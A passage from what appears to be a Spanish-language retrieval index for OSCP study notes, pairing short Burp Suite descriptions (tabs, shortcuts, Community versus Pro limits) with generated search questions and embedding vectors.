-0.0382, -0.10075, -0.01072, 0.05331, 0.06474, -0.15758, -0.00494, 0.01124, 0.0088, -0.05621, -0.21053, -0.11189, 0.03794, -0.0046, -0.06488, -0.02346, -0.12967, -0.08075, 0.0201, -0.00772, -0.02028, -0.05804, -0.07814, -0.04229, 0.04456, -0.06777, -0.06298, -0.09067, 0.0764, -0.04566, -0.04194, 0.01319, -0.09091, -0.09201, 0.012, -0.06156, -0.09688, 0.03153, 0.16804, -0.06882, -0.00273, -0.04266, 0.01801, -0.12219, -0.09014, -0.0341, -0.11695, 0.0483, 0.05474, 0.08418, 0.06337, 0.00277, 0.12001, 0.03768, -0.03326, 0.092, 0.01135, 0.03577, 0.04709, 0.14216, 0.07073, -0.07428, 0.03175, -0.09891, -0.01899, -0.01539, 0.0558, -0.05633, -0.00039, 0.06376, 0.00825, 0.03563, -0.01735, 0.01426, -0.13461, -0.03056, 0.04796, -0.01677, 0.12147, -0.04231, 0.01339, 0.00595, 0.02656, 0.0165, -0.08366, 0.05986, -0.03151, 0.00833, -0.00713, -0.02383, -0.09821, -0.02033, -0.07667, -0.11884, 0.0121, 0.1203, 0.00113, -0.04534, -0.07952, -0.01101, 0.01694, 0.01005, 0.05964, 0.02024, 0.01511, 0.07748, 0.06156, -0.00544, -0.04781, -0.08521, -0.08258, 0.00884, 0.0424, -0.10102, 0.00431, -0.04651, 0.00321, -0.00143, -0.02119, -0.02093, -0.06287, -0.01881, 0.07091, -0.00281, 0.0058, -0.0139, 0.03749, -0.06105, 0.05594, -0.05303, 0.0851, 0.06248, -0.09316, 0.02408, -0.00879, -0.10502, -0.10602, 0.11732, 0.00471, 0.05996, 0.00238, -0.07519, -0.03553, -0.02775, -0.07665, -0.0072, 0.03007, -0.00797, 0.04247, -0.02707, -0.00061, -0.03971, -0.06471, 0.04645, -0.04505, 0.00285, -0.02355, -0.02747, -0.03745, -0.01954, -0.03164, 0.0089, -0.03712, 0.01432, -0.04194, -0.10324, 0.03879, -0.01022, 0.0873, 0.02877, 0.00816, 0.03964, 0.02153, -0.01291, -0.0291, 0.09732, -0.04376, -0.05142, 0.00204, -0.02382, 1e-05, 0.03809, 0.00044, -0.01275, 0.03222, 0.02653, 0.01226, -0.00497, 0.01153, -0.01577, -0.00433, -0.01743, 0.03178, -0.01206, 0.05596, 0.0186, 0.01167, 0.04217, -0.03435, 0.1011, 0.09422, -0.06723, -0.01134, -0.01289, -0.01953, -0.02294, 0.01094, 0.0149, 0.00115, 0.01679, 0.03729, -0.01885, 0.03126, 0.00592, 0.03616]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Las pestaΓ±as que usarΓ‘s\n```\nProxy β†’ Intercept ON/OFF. Capturas y reenvΓ­as/modificas peticiones.\nTarget β†’ Site map: el Γ‘rbol de todo lo que has visitado.\nRepeater β†’ reenviar UNA peticiΓ³n tweakeΓ‘ndola β†’ Burp Repeater e Intruder\nIntruder β†’ automatizar payloads (fuzzing, fuerza bruta) β†’ Burp Repeater e Intruder\nDecoder β†’ URL/base64/hex encode-decode\nComparer β†’ diff entre dos respuestas\n```", "indexar": "quΓ© programa me sirve para interceptar y modificar las peticiones web?", "v": [0.10638, 0.1959, -0.13971, -0.20587, 0.13235, -0.08932, -0.03187, 0.01657, -0.0927, -0.05804, 0.04818, -0.01153, 0.03511, -0.19328, 0.06468, 0.04175, 0.05593, -0.02654, 0.16567, -0.00197, 0.06728, -0.0016, 0.06729, -0.11902, -0.20514, 0.00472, -0.02588, -0.0389, -0.02974, -0.04903, -0.0654, -0.07019, -0.01356, 0.0847, -0.1036, 0.00233, 0.01935, 0.00952, 0.00949, 0.05462, 0.03896, -0.03977, -0.09054, -0.0213, 0.10823, -0.03693, 0.01612, 0.01558, -0.01632, -0.02526, 0.03814, -0.00491, -0.08853, 0.01399, -0.03967, 0.03882, 0.11176, -0.20857, -0.00649, -0.02656, -0.09121, -0.02244, 0.04102, -0.03213, 0.07301, -0.02515, -0.08677, 0.00898, -0.02529, 0.04596, -0.00381, -0.03577, 0.08177, -0.0316, 0.11836, 0.02248, -0.03181, -0.08755, 0.01237, -0.03913, -0.08389, 0.00495, -0.07899, 0.10616, 0.00279, 0.09868, 0.02356, -0.13358, -0.081, -0.05231, 0.09846, 0.19419, 0.02727, 0.01501, 0.07017, -0.0796, 0.04608, 0.06304, -0.00434, 0.01837, 0.06747, -0.06571, -0.11793, 0.0064, -0.00137, 0.04368, 0.00015, -0.02774, -0.02906, 0.07464, -0.08015, -0.00258, -0.06294, -0.00564, -0.02203, -0.02153, -0.06394, -0.01652, 0.03562, -0.07955, -0.09164, 0.03102, -0.08094, -0.03728, 0.04926, -0.00762, -0.02553, 0.10244, 0.02416, 0.00616, -0.05248, -0.03369, -0.01675, -0.06213, -0.00581, -0.09399, -0.02573, -0.05891, 0.044, -0.00664, 0.01079, 0.03831, 0.03336, 0.05013, -0.02643, -0.01726, 0.07496, -0.02892, -0.05311, -0.01491, -0.00506, -0.05491, -0.05768, -0.01423, -0.08519, 0.03711, 0.0254, -0.10081, -0.08319, 0.03915, -0.05891, -0.01257, -0.02077, -0.05798, 0.07647, -0.11376, -0.07901, 0.0626, 0.07813, 0.02384, -0.01714, 0.02852, -0.01393, -0.11713, 0.00938, -0.03417, -0.04859, -0.03057, 0.0557, -0.04328, -0.10051, 0.09918, 0.07163, 0.0767, -0.00775, -0.02404, -0.01778, 0.05278, 0.03148, 0.03155, 0.05803, 0.06175, -0.01724, -0.03486, 0.01067, 0.03332, -0.03791, 0.02885, 0.10186, -0.01037, -0.00343, -0.08007, 0.01763, -0.06406, -0.00257, 0.0231, -0.01184, -0.06022, 0.05395, 0.10097, -0.01204, 0.01589, 0.04767, -0.00216, 0.00635, -0.0598, 0.01671, 0.08885, 0.01839, 0.01092, 0.01485, -0.00035, 0.0273, 0.04237, -0.01478, -0.00866, 0.01343, 0.02435, 0.03518, 0.06466, -0.0254, -0.08197, -0.05903, -0.009, -0.00251, -0.01393, -0.03422, -0.01746, -0.02166, -0.08612, 0.00933, 0.05621, -0.03399, -0.02348, 0.02043, -0.03884, -0.05382, 0.00502, 0.04217, -0.00205, -0.07896, 0.04197, 0.03209, -0.03794, 0.04958, 0.00675]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Las pestaΓ±as que usarΓ‘s\n```\nProxy β†’ Intercept ON/OFF. Capturas y reenvΓ­as/modificas peticiones.\nTarget β†’ Site map: el Γ‘rbol de todo lo que has visitado.\nRepeater β†’ reenviar UNA peticiΓ³n tweakeΓ‘ndola β†’ Burp Repeater e Intruder\nIntruder β†’ automatizar payloads (fuzzing, fuerza bruta) β†’ Burp Repeater e Intruder\nDecoder β†’ URL/base64/hex encode-decode\nComparer β†’ diff entre dos respuestas\n```", "indexar": "con quΓ© puedo hacer un mapa de sitios que haya visitado?", "v": [-0.00935, 0.21256, -0.18315, 0.10778, 0.01187, -0.08534, 0.05504, -0.08135, -0.0347, -0.12565, 0.02638, -0.04171, 0.06743, 0.03149, 0.08079, 0.05157, 0.21436, 0.10375, 0.12635, -0.07081, 0.01218, 0.04409, 0.0194, 0.09642, -0.10399, -0.08731, 0.10574, -0.0404, -0.10995, 0.00352, 0.06956, 0.04246, -0.07326, 0.0438, -0.01643, -0.0672, 0.1512, 0.00918, -0.04198, -0.12569, -0.05377, 0.02516, 0.00223, -0.02541, -0.03599, -0.10531, -0.12781, -0.10295, -0.04728, -0.03274, -0.03943, -0.05624, -0.09854, -0.03565, 0.11272, 0.02026, 0.07268, -0.0727, 0.12918, -0.00635, -0.08503, 0.02119, -0.04202, 0.04115, 0.00509, 0.00922, 0.0509, 0.1114, 0.05525, -0.04283, -0.06743, 0.00328, 0.09825, -0.00337, 0.04362, -0.02832, 0.03149, 0.02378, 0.00182, -0.00776, 0.06262, 0.00666, -0.11886, -0.12163, -0.10181, -0.01932, -0.07939, -0.07608, -0.01841, -0.11181, 0.06455, 0.10507, -0.01872, 0.02021, -0.14153, -0.0549, 0.00668, 0.0279, 0.03989, 0.11144, 0.03858, -0.02749, -0.06585, 0.07283, -0.00359, 0.03389, 0.06619, -0.03432, -0.00488, 0.01096, 0.05568, 0.01328, -0.15264, -0.06328, -0.06388, -0.03387, -0.02398, 0.00686, 0.00908, -0.08435, -0.08655, 0.01422, -0.08095, 0.03258, -0.01432, 0.00753, -0.01317, 0.01851, -0.02376, -0.0418, -0.01975, 0.06161, -0.05371, -0.07498, 0.00431, 0.0064, 0.02279, -0.00393, 0.0551, 0.03566, 0.03169, 0.05521, 0.03543, 0.01572, -0.01074, 0.03908, 0.0228, -0.05012, -0.14931, 0.01411, -0.03771, 0.09764, 0.0697, 0.07402, 0.03271, 0.03368, -0.00704, -0.04393, -0.01387, 0.07582, -0.0519, 0.04979, -0.01076, 0.06676, 0.03351, -0.0134, -0.06925, 0.01814, 0.03404, 0.08273, -0.10203, 0.09268, -0.04011, -0.09618, 0.04675, 0.00451, -0.00954, -0.01066, 0.03443, -0.03173, 0.01355, -0.04331, -0.05756, -0.00142, -0.07776, 0.01549, 0.07553, -0.02404, 0.07959, 0.03451, -0.00948, 0.06673, 0.03534, 0.03989, 0.04554, -0.05752, 0.04627, 0.08504, 0.04416, -0.0817, 0.01428, -0.09071, -0.00138, -0.03496, 0.00188, 0.07984, -0.03075, -0.0495, -0.01627, 0.07347, 0.02346, -0.00645, 0.04069, -0.07749, -0.04256, -0.00837, 0.00754, -0.0231, -0.07226, 0.01705, 0.09714, 0.08331, 0.04415, 0.02053, 0.03934, 0.03641, 0.06106, -0.01221, 0.03718, 0.06993, 0.006, -0.02748, -0.00909, 0.00408, 0.0516, -0.01791, -0.03283, -0.00129, -0.06863, -0.02114, 0.03167, 0.04432, -0.01427, -0.03746, 0.00713, -0.09035, -0.07757, 0.00949, -0.03399, -0.03265, -0.06498, -0.03145, 0.05638, -0.0122, 0.02522, -0.02127]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Las pestaΓ±as que usarΓ‘s\n```\nProxy β†’ Intercept ON/OFF. Capturas y reenvΓ­as/modificas peticiones.\nTarget β†’ Site map: el Γ‘rbol de todo lo que has visitado.\nRepeater β†’ reenviar UNA peticiΓ³n tweakeΓ‘ndola β†’ Burp Repeater e Intruder\nIntruder β†’ automatizar payloads (fuzzing, fuerza bruta) β†’ Burp Repeater e Intruder\nDecoder β†’ URL/base64/hex encode-decode\nComparer β†’ diff entre dos respuestas\n```", "indexar": "cuΓ‘l es una herramienta para automatizar payloads con fuerza bruta?", "v": [0.13085, -0.00344, -0.14312, -0.07431, 0.00734, 0.02618, 0.05463, -0.05433, -0.11708, -0.02332, -0.10286, -0.00396, 0.00235, 0.18967, -0.04831, -0.01335, -0.08216, -0.12249, -0.15587, 0.02245, 0.01612, -0.07776, -0.00153, -0.08206, -0.10324, 0.05711, -0.00585, 0.08746, -0.33113, 0.05182, 0.00858, 0.13448, 0.14157, -0.07731, 0.03366, -0.03294, 0.01711, 0.15156, 0.05158, 0.09314, -0.07253, 0.122, -0.09862, 0.05245, 0.07672, 0.07522, -0.00729, 0.05546, 0.03351, 0.00289, -0.04484, -0.08014, -0.04538, -0.00966, -0.05448, -0.2145, 0.18162, -0.092, -0.03716, -0.00432, -0.04549, 0.11939, -0.09205, -0.00799, -0.09215, -0.03193, 0.01502, -0.06792, -0.02414, -0.01641, -0.02861, -0.07282, -0.03095, 0.03779, -0.00435, 0.0325, -0.02583, 0.07465, -0.00018, 0.08045, 0.03617, -0.0121, -0.15224, 0.01774, -0.01343, -0.06192, 0.10476, -0.01943, 0.035, -0.08106, 0.00482, -0.00364, -0.0243, 0.07302, -0.01281, 0.03543, 0.04426, -0.06226, -0.0294, -0.04403, 0.08335, -0.0572, -0.0151, -0.02339, 0.11925, -0.01679, -0.0289, -0.04288, -0.0356, 0.00782, 0.10637, -0.04533, 0.0289, 0.08178, -0.08165, 0.01601, -0.04446, -0.01815, -0.0152, -0.07214, 0.00755, 0.06484, -0.02199, -0.00357, 0.01092, -0.00153, -0.00237, 0.12768, 0.04556, -0.11487, 0.01488, 0.04308, -0.00858, -0.0044, 0.01956, -0.03987, 0.08531, -0.11542, -0.04357, -0.08239, 0.01206, 0.05945, 0.07071, -0.07281, 0.09488, 0.03522, 0.00118, -0.01999, -0.04033, 0.00945, 0.07228, -0.03405, 0.04244, 0.01505, -0.03015, -0.0109, 0.08224, 0.01376, -0.07034, -0.01913, -0.01787, -0.04986, -0.08347, -0.03122, 0.00223, -0.00569, -0.0426, -0.00303, -0.01628, 0.02031, 0.04326, -0.03028, 0.05292, 0.0614, -0.00231, -0.0675, -0.05779, 0.03574, -0.00102, -0.00883, -0.07157, 0.02954, -0.00942, 0.02241, 0.02746, -0.0337, 0.04302, -0.03047, 0.04541, 0.05065, 0.01484, 0.05017, -0.02776, -0.07373, 0.01898, -0.0111, -0.06566, 0.00654, 0.02665, 0.00337, 0.00362, -0.05947, -0.01706, -0.03708, 0.01242, 0.05531, 0.02807, -0.01659, 0.02002, -0.02522, 0.0445, -0.02903, 0.06281, -0.07501, -0.04397, -0.01697, -0.0609, 0.00262, 0.01196, 0.0111, -0.01021, 0.03017, 0.03066, -0.03003, -0.04118, 0.06781, 0.07583, 0.00969, 0.04327, -0.0094, -0.01193, -0.00141, -0.00733, 0.02256, 0.01127, -0.00997, 0.0305, -0.00577, -0.09539, -0.01323, 0.0287, 0.04422, -0.02535, -0.09485, -0.08164, -0.01429, -0.00595, -0.01062, -0.04944, -0.03067, -0.01298, 0.07115, 0.05363, -0.02859, 0.00683, -0.02595]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Atajos clave\n- `Ctrl+R` β†’ enviar peticiΓ³n a **Repeater**\n- `Ctrl+I` β†’ enviar a **Intruder**\n- `Ctrl+Shift+B` β†’ base64", "indexar": "que programa sirve para repetir peticiones HTTP?", "v": [0.01958, 0.08747, -0.12866, -0.16446, 0.10353, -0.17446, -0.00748, -0.05178, 0.10478, 0.01361, -0.0612, 0.07133, 0.03302, -0.11652, 0.05672, -0.05394, 0.05196, -0.06342, 0.20335, -0.02337, 0.04372, 0.05327, 0.00432, -0.05825, -0.13287, -0.03838, 0.10041, 0.05018, -0.10301, -0.07612, 0.05892, -0.07534, -0.13922, 0.07967, -0.1048, 0.0376, -0.04572, 0.09097, -0.02866, 0.05459, 0.01488, 0.04573, -0.06425, -0.01486, -0.05653, 0.00312, 0.02568, -0.08097, 0.03132, -0.11574, 0.00502, -0.04281, -0.16712, 0.06505, -0.04271, 0.112, 0.05925, -0.22695, -0.06107, -0.11007, -0.00224, -0.11749, 0.09704, -0.05458, 0.07806, -0.04604, 0.00836, 0.06295, -0.05362, 0.08262, -0.10629, 0.01712, 0.07594, -0.0959, 0.09545, 0.01216, -0.00804, -0.12188, -0.03518, 0.02222, 0.03095, 0.01204, -0.05529, 0.06459, -0.05049, 0.01856, -0.03531, -0.03208, 0.07423, -0.03716, 0.05764, 0.16075, 0.00434, 0.03182, 0.04097, -0.10302, 0.07115, 0.01007, 0.04419, 0.04732, -0.0069, -0.01683, -0.02106, -0.02658, 0.01068, 0.12756, 0.10578, -0.0513, 0.00307, -0.00489, 0.01478, -0.02432, -0.07341, 0.02402, 0.00915, -0.01284, -0.08203, 0.00373, 0.05666, -0.04733, -0.04863, 0.00342, -0.1222, 0.01991, 0.02628, 0.02612, -0.01648, 0.05708, -0.00111, 0.03628, 0.02248, 0.04396, -0.07014, 0.00364, -0.08341, -0.06827, 0.07732, -0.04202, 0.03258, 0.00968, 0.00607, 0.11583, -0.0222, -0.01141, 0.02598, 0.00703, 0.06787, -0.04323, 0.02299, 0.03538, 0.01421, -0.00036, -0.06352, 0.02459, -0.11535, -0.03204, 0.03604, -0.08414, -0.06362, 0.09318, -0.00442, -0.00992, 0.03361, 0.00677, 0.04856, 0.05841, -0.11594, 0.04885, 0.09879, 0.03337, -0.0167, 0.0707, -0.04702, -0.15688, -0.05837, -0.03575, -0.02574, -0.0337, 0.01698, -0.01537, -0.09075, -0.00547, 0.01793, 0.04831, 0.02109, -0.07175, 0.01381, 0.03163, 0.05757, -0.00491, 0.06116, 0.02538, -0.08685, 0.03635, 0.01839, 0.03931, -0.07415, -0.01005, 0.07725, -0.02299, -0.07785, -0.03265, 0.0384, -0.04046, 0.02331, 0.06699, 0.01199, -0.02684, 0.00104, 0.04428, 0.01301, -0.0304, 0.0444, 0.03046, 0.00684, -0.04937, 0.06232, 0.0478, -0.0157, 0.01878, -0.02767, 0.00295, 0.00104, 0.0348, 0.02088, -0.05438, 0.07472, -0.03127, 0.03832, 0.00166, -0.02831, -0.02603, -0.07574, -0.02796, 0.04122, -0.00061, -0.04246, -0.00959, -0.01471, -0.07266, 0.00648, 0.04201, -0.04612, -0.03041, 0.04038, -0.0315, -0.07516, -0.01534, 0.01967, 0.02882, -0.0827, 0.01547, 0.01213, -0.05126, 0.01039, 0.01231]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Atajos clave\n- `Ctrl+R` β†’ enviar peticiΓ³n a **Repeater**\n- `Ctrl+I` β†’ enviar a **Intruder**\n- `Ctrl+Shift+B` β†’ base64", "indexar": "cual es una herramienta para realizar ataques de intrusiΓ³n automatizados?", "v": [-0.02296, 0.10541, -0.18587, -0.09034, 0.06713, -0.04838, -0.05854, 0.00629, -0.05511, 0.08998, -0.06555, -0.0774, -0.02813, -0.01594, 0.0735, 0.0222, 0.06865, -0.1091, 0.02379, 0.08469, -0.05904, 0.04699, -0.0287, 0.03447, -0.15784, -0.00764, -0.02371, 0.03626, -0.17062, -0.04064, -0.01173, 0.00727, 0.0402, -0.03284, -0.01621, -0.179, -0.04112, 0.16072, 0.05642, 0.1243, -0.03056, 0.00131, -0.21172, 0.0006, 0.13945, -0.02865, 0.02961, 0.03445, 0.08509, 0.05297, -0.01226, -0.03274, -0.15864, -0.0543, 0.02244, -0.18289, 0.20597, -0.11739, 0.06546, -0.10288, -0.12868, 0.06487, -0.02156, -0.00284, -0.00199, -0.07727, 0.0345, -0.06311, -0.00392, 0.10398, 0.04089, -0.01737, -0.00454, -0.01756, 0.04834, -0.01605, 0.00659, 0.084, 0.0441, -0.00914, 0.02021, -0.02366, -0.07525, -0.01554, -0.07926, -0.09938, 0.08442, -0.06965, -0.05457, -0.06555, -0.01247, -0.02106, -0.04716, -0.0167, 0.0025, -0.00475, 0.02762, -0.1044, -0.02296, -0.02489, 0.08955, -0.0634, -0.12997, 0.11748, -0.02862, 0.00143, -0.08021, 0.01902, -0.01183, -0.14093, 0.0189, 0.02913, 0.02066, -0.04645, 0.04245, 0.01417, -0.0662, -0.02896, 0.0592, -0.10883, -0.07427, 0.02468, -0.06715, 0.01504, 0.00443, -0.03266, -0.02173, 0.02011, -0.06981, -0.1055, 0.00203, -0.03069, -0.02041, 0.00066, -0.02876, -0.0149, -0.01939, -0.17233, -0.07886, -0.0081, 0.07381, 0.07883, 0.02241, -0.06113, 0.06664, 0.04408, 0.00832, -0.02476, -0.07086, 0.03204, -0.00837, 0.00195, 0.04726, 0.09663, -0.01154, 0.01452, -0.0552, -0.05261, -0.06726, 0.12656, 0.00362, 0.00523, 0.01091, 0.0131, -0.03557, -0.04059, 0.00718, 0.00125, 0.05293, 0.03183, -0.00537, 0.05814, 0.05987, -0.04463, -0.04339, -0.04312, -0.09059, -0.05365, 0.0198, -0.06815, -0.04152, -0.04068, -0.04862, -0.03036, 0.03649, -0.03268, 0.08787, -0.03198, 0.04526, 0.02841, -0.00201, 0.01855, -0.06341, -0.01671, 0.05661, -0.00367, -0.05214, -0.05875, -4e-05, 0.00759, -0.03001, -0.02988, -0.02922, -0.07723, 0.01079, 0.11537, 0.02531, -0.07755, -0.04688, 0.03718, 0.061, -0.02584, 0.06527, -0.0546, -0.02585, -0.00464, 0.0042, 0.00841, -0.05163, -0.03188, 0.04216, -0.00455, 0.07517, -0.02037, -0.04507, 0.03119, 0.00719, -0.00169, 0.02163, 0.0078, -0.03061, -0.04936, -0.0131, -0.05338, 0.0395, -0.02822, 0.05345, -0.0595, -0.06701, -0.04246, -0.01086, 0.03248, 0.01493, -0.05067, -0.06404, -0.04187, -0.04821, -0.01054, -0.00808, -0.08055, 0.00335, 0.04747, 0.01079, -0.03096, 0.04301, -0.01878]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Atajos clave\n- `Ctrl+R` β†’ enviar peticiΓ³n a **Repeater**\n- `Ctrl+I` β†’ enviar a **Intruder**\n- `Ctrl+Shift+B` β†’ base64", "indexar": "como puedo convertir texto en base64 desde la terminal?", "v": [0.04256, -0.01147, -0.16762, -0.08715, -0.02567, -0.12739, -0.03472, -0.10655, 0.02192, -0.02969, -0.09914, 0.07094, 0.02926, -0.01688, -0.01587, 0.02766, -0.00734, -0.10429, -0.0098, -0.13735, -0.0129, -0.1314, -0.02319, -0.08432, 0.04955, 0.03464, -0.10662, -0.20001, -0.07726, -0.1104, 0.05118, -0.10025, 0.01879, -0.00932, -0.10468, -0.03976, -0.08399, 0.07735, -0.03664, 0.03521, 0.052, 0.09308, -0.14576, 0.25278, -0.00112, -0.07083, 0.07625, -0.01545, 0.094, -0.14139, 0.00706, -0.11777, -0.16865, -0.01379, -0.10306, -0.14742, 0.13731, -0.07194, 0.08943, 0.05472, -0.00741, 0.0623, 0.09695, 0.00415, 0.00776, 0.01472, -0.0058, 0.07989, -0.08567, 0.05367, -0.08996, 0.14888, -0.11446, 0.05147, 0.03397, 0.07651, 0.00838, -0.04191, 0.07418, 0.08561, -0.04421, 0.04637, -0.05366, -0.01846, 0.00934, -0.05553, -0.03237, -0.02194, 0.05437, -0.01001, 0.16686, -0.04998, 0.0353, 0.04616, -0.04789, -0.06204, -0.03405, -0.0123, -0.02088, 0.01565, 0.0065, -0.03726, -0.00166, -0.02365, 0.08763, -0.02845, 0.08178, -0.10333, -0.03454, 0.00384, -0.01455, 0.05611, 0.04304, 0.02794, 0.02788, -0.04899, -0.0157, 0.05691, 0.04543, -0.06411, -0.05595, 0.0038, -0.0337, 0.00232, 0.10197, 0.01435, 0.00125, 0.02832, 0.02208, 0.03545, -0.03485, -0.00063, -0.00665, 0.02015, -0.07503, 0.09662, 0.06251, -0.07736, -0.0325, -0.04852, 0.01594, 0.06266, -0.04683, 0.01466, 0.12287, 0.11233, 0.06521, -0.03083, -0.10244, -0.10303, 0.03898, -0.02553, 0.0039, -0.00035, -0.05754, 0.00719, 0.06544, 0.02519, -0.05796, 0.02899, -0.06438, -0.00059, -0.06154, 0.02435, -0.03354, -0.01983, -0.05801, -0.09693, -0.02946, 0.01537, -0.0082, 0.05073, 0.02575, -0.01231, 0.01066, -0.01969, -0.10021, 0.01389, -0.01015, 0.00803, 6e-05, 0.00116, 0.05278, -0.01262, 0.03524, -0.03882, -0.01483, -0.00311, 0.01364, -0.00947, 0.04736, -0.01934, -0.08051, -0.00944, -0.05295, -0.01758, -0.02031, 0.01829, -0.00963, -0.10311, -0.03149, 0.03, -0.01898, 0.00271, 0.02809, -0.01079, -0.00577, -0.00963, -0.07054, 0.12112, -0.02545, -0.00033, -0.0098, 0.0217, -0.01415, -0.00696, 0.02873, -0.02129, 0.00525, 0.01497, 0.06693, -0.02696, -0.01151, -0.04049, -0.01154, 0.05245, 0.00779, 0.06176, 0.04897, -0.00444, -0.08494, -0.00016, -0.05823, 0.00568, -0.01757, -0.05331, -0.04147, 0.02504, -0.04235, -0.05293, 0.0705, 0.03705, -0.05866, -0.04726, 0.00852, -0.02502, -0.08828, 0.05147, 0.00411, -0.01876, -0.04246, 0.04677, 0.10977, 0.00017, -0.05175, 0.009]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Community vs Pro (OSCP)\nCommunity vale de sobra para el examen. Limitaciones: **Intruder va ralentizado** y **no hay scanner activo** (que de todas formas estΓ‘ prohibido β†’ Reglas de herramientas). Para fuzzing/fuerza bruta intensiva tira de Content discovery (ffuf) o hydra.", "indexar": "Con quΓ© programa puedo hacer fuerza bruta o fuzzing si no tengo acceso al scanner activo?", "v": [-0.00583, 0.00281, -0.29377, -0.12549, -0.07766, 0.01779, -0.03908, -0.0945, -0.15965, -0.0816, -0.10923, 0.02591, -0.10874, 0.11572, 0.01868, -0.02013, -0.02325, -0.1167, -0.04409, 0.06115, 0.02255, -0.07996, -0.00942, -0.18292, -0.02749, -0.02385, -0.06489, 0.07417, -0.03288, -0.04788, 0.09879, 0.05991, 0.21419, 0.01958, 0.03373, 0.01013, 0.05676, 0.04042, 0.18141, 0.13271, -0.06615, 0.10935, -0.11485, -0.03474, 0.03817, 0.0077, -0.00911, -0.00077, -0.02741, 0.06989, -0.07849, -0.04639, 0.02005, -0.09458, -0.08894, -0.14156, -0.02128, -0.06499, -0.03274, -0.01552, 0.10296, 0.01869, 0.01133, -0.08264, -0.06356, -0.04029, 0.08728, 0.00325, -0.02658, 0.02069, -0.11417, -0.04348, -0.00516, -0.07907, -0.04959, -0.03016, -0.00919, -0.09915, -0.00216, 0.01206, -0.06866, 0.0491, -0.07327, 0.00551, -0.0816, -0.09135, -0.02555, -0.11743, -0.01325, -0.05408, 0.03692, 0.05897, 0.00313, 0.06358, 0.02006, 0.07869, 0.02196, 0.09299, -0.0196, 0.02267, 0.03763, -0.03222, -0.13409, 0.04157, 0.09226, -0.05582, -0.03561, 0.01062, -0.07893, 0.08631, -0.03324, -0.001, -0.08801, -0.0618, -0.06577, 0.0452, -0.07485, -0.09163, -0.00204, 0.0071, -0.03607, 0.05054, -0.01093, 0.06291, 0.05751, 0.03498, 0.06553, 0.0866, -0.02157, -0.03771, 0.04415, 0.03364, 0.0158, -0.07852, -0.0073, -0.07551, -0.0055, -0.07914, 0.03995, -0.06924, -0.0279, 0.03149, 0.04985, 0.02706, 0.07065, -0.04781, -0.01553, -0.03753, -0.04192, 0.00846, 0.02323, -0.03175, 0.05019, 0.12861, -0.03828, -0.03663, 0.12338, -0.03532, -0.06298, 0.01972, -0.05487, -0.00343, -0.13484, -0.05331, -0.00993, 0.0657, -0.08929, -0.03979, -0.00511, 0.00674, -0.08135, -0.02202, 0.07531, -0.03216, 0.03461, -0.05224, 0.00813, 0.01284, 0.02107, -0.07306, -0.02453, 0.08142, 0.0969, -0.02356, 0.02585, 0.00367, -0.00562, -0.00567, 0.03995, -0.00508, 0.03591, 0.02391, -0.04736, 0.05343, 0.03712, -0.02988, -0.03538, 0.00675, 0.03054, -0.04444, -0.01279, -0.04199, 0.01709, -0.03177, 0.03187, 0.08626, -0.01129, 0.01792, 0.0291, 0.01182, -0.01622, -0.00988, 0.07658, -0.02368, -0.04337, -0.00127, -0.04751, 0.06439, 0.07914, -0.0294, -0.00566, 0.03358, -0.00527, 0.05917, 0.0226, -0.08927, 0.05734, -0.02615, 0.08248, 0.05915, 0.02087, -0.04707, -0.03188, -0.00014, -0.0255, 0.04284, -0.00724, 0.05277, -0.05707, -0.02032, -0.02914, 0.04295, 0.01826, -0.01983, -0.03766, 0.06104, -0.0129, -0.01654, -0.07741, -0.00185, -0.0008, 0.04695, 0.06011, -0.03437, 0.05431, 0.0337]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Community vs Pro (OSCP)\nCommunity vale de sobra para el examen. Limitaciones: **Intruder va ralentizado** y **no hay scanner activo** (que de todas formas estΓ‘ prohibido β†’ Reglas de herramientas). Para fuzzing/fuerza bruta intensiva tira de Content discovery (ffuf) o hydra.", "indexar": "Existe alguna alternativa gratuita a las herramientas intrusivas para el examen OSCP?", "v": [-0.11228, 0.08122, -0.2067, -0.12467, -0.03261, -0.09246, -0.045, 0.01703, -0.13259, -0.02349, -0.08637, -0.08725, -0.0395, 0.04026, 0.1358, 0.05057, 0.06226, -0.04711, 0.06947, -0.00551, -0.09454, -0.01748, -0.15261, 0.09175, -0.03612, 0.01144, -0.17906, -0.05203, -0.07027, -0.03207, 0.03708, 0.0854, 0.00205, -0.05779, -0.13055, -0.05005, -0.06009, -0.01573, 0.0965, 0.12505, 0.08905, 0.04199, -0.00632, 0.11837, 0.1002, -0.07581, -0.03717, 0.20119, -0.04263, -0.00541, -0.08017, -0.15407, -0.06317, -0.04771, 0.00573, -0.11254, 0.13082, -0.06568, 0.03018, -0.14426, -0.03027, 0.09816, -0.05713, -0.01144, 0.06026, -0.02236, -0.0501, -0.038, -0.11687, 0.05918, -0.03088, 0.05091, -0.04546, -0.07333, -0.07959, -0.10487, -0.07309, 0.02562, 0.12183, 0.04216, 0.04547, -0.056, 0.0854, 0.04433, -0.12758, -0.10297, 0.01856, -0.10169, -0.03751, -0.05843, 0.01247, 0.07726, 0.05687, 0.0891, 0.02818, 